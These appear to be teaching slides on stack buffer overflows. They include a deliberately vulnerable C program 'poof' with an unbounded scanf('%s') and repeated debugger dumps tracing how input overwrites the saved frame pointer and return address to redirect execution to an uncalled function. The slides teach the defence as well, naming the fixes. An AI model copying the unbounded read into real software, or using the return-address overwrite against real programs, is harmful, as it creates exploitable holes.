Busted! Why Security Systems Fail — Capability List
Busted !
Why Security Systems Fail
Capability List
Access Control List
Access Control List
Memory layout used in this example: two arrays drawn adjacent in memory, char name[9] followed immediately by char degree[4], all bytes initially 00:

  name[9]:    00 00 00 00 00 00 00 00 00
  degree[4]:  00 00 00 00

strcpy(name, "charles");   -- 7 characters + terminating 00 = 8 bytes, fits in name[9]
strcpy(degree, "PhD");     -- 3 characters + terminating 00 = 4 bytes, fits in degree[4]

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 's' 00 00
  degree[4]:  'P' 'h' 'D' 00

printf(name);    prints  charles
printf(degree);  prints  PhD

(Aside, separate from the overflow being illustrated: printf(name) passes data as the format string, which is itself a bug — format-string injection if name is ever user-controlled. The safe spelling is printf("%s", name).)
strcpy(name, "charleton");   -- 9 characters + terminating 00 = 10 bytes, one more than name[9] can hold

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
  degree[4]:  00 ...                 <- the terminating 00 of "charleton" has spilled into degree[0]

strcpy(degree, "PhD");       -- overwrites that spilled terminator

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
  degree[4]:  'P' 'h' 'D' 00

printf(name);    prints  charletonPhD   -- name no longer has a 00 of its own, so the read runs on through degree until the 00 after 'D'
printf(degree);  prints  PhD

strcpy never looked at the size of its destination: a single overflowing byte was enough to merge two variables. The same mechanism with a longer input overwrites whatever else lies beyond the buffer — in the next example, a saved frame pointer and a return address.
/*
 * "poof": the deliberately vulnerable demo program traced on the slides below.
 *
 * string[] is two bytes long, but scanf("%s") copies as many input characters
 * as arrive, so anything longer than one character runs past the end of the
 * buffer and overwrites what sits above it on the stack: the frame padding,
 * the saved rbp and then main()'s return address (see the memory dumps that
 * follow).  Nothing in main() calls secret1(); it can only be reached by
 * replacing that return address.
 *
 * For any real program the fix is a bounded read -- scanf("%1s", string) or
 * fgets(string, sizeof string, stdin).  It is left unfixed here on purpose.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Never called by main(); the attacker's target (secret1+0 = 0x100000e40 on the slides). */
void secret1(void)
{
    puts("You found the secret function No. 1!\n");
}

int main(void)
{
    char string[2];                 /* room for one character plus its terminator */

    puts("Input: ");
    scanf("%s", string);            /* UNBOUNDED write: stack buffer overflow */
    printf("You entered %s.\n", string);
    return 0;
}
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e52rbp 0x7fff5fbff828rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53  rbp 0x7fff5fbff828  rsp 0x7fff5fbff810  (one instruction in: push %rbp has moved rsp down by 8 from 0x7fff5fbff818 and stored the caller's rbp, 0x7fff5fbff828, at 0x7fff5fbff810 — compare that row of the dump below with the startup dump, where it still held 0x7fff5fbff820.)
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53  rbp 0x7fff5fbff828  rsp 0x7fff5fbff810  (one instruction in: push %rbp has moved rsp down by 8 from 0x7fff5fbff818 and stored the caller's rbp, 0x7fff5fbff828, at 0x7fff5fbff810 — compare that row of the dump below with the startup dump, where it still held 0x7fff5fbff820.)
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53  rbp 0x7fff5fbff828  rsp 0x7fff5fbff810  (one instruction in: push %rbp has moved rsp down by 8 from 0x7fff5fbff818 and stored the caller's rbp, 0x7fff5fbff828, at 0x7fff5fbff810 — compare that row of the dump below with the startup dump, where it still held 0x7fff5fbff820.)
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53  rbp 0x7fff5fbff828  rsp 0x7fff5fbff810  (one instruction in: push %rbp has moved rsp down by 8 from 0x7fff5fbff818 and stored the caller's rbp, 0x7fff5fbff828, at 0x7fff5fbff810 — compare that row of the dump below with the startup dump, where it still held 0x7fff5fbff820.)
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Before call to puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e61rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just inside of puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000ea4rbp 0x7fff5fbff810rsp 0x7fff5fbff7f8
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just after return from puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e66rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just inside scanf( )
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000eaa  rsi 0x7fff5fbff800  rbp 0x7fff5fbff810  rsp 0x7fff5fbff7f8  (rip is the scanf stub that the callq at main+36 jumped to, not main+20; the return address it pushed, 0x100000e7b = main+41, is at 0x7fff5fbff7f8 in the dump below. rsi holds &string = rbp-0x10 = 0x7fff5fbff800, where scanf will start writing — with no length limit, since the format is a bare %s.)
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
After return from scanf ( )
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e7brbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just before stack cleanup
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e95rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
And ready to return to the operating system?
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e96  rbp 0x4141414141414141  rsp 0x7fff5fbff818  (leaveq has restored rbp from the saved-rbp slot at 0x7fff5fbff810, which scanf filled with eight 'A' bytes, and left rsp pointing at the return-address slot 0x7fff5fbff818 — which now holds 0x100000e40, not main's real caller. The retq about to execute will pop it.)
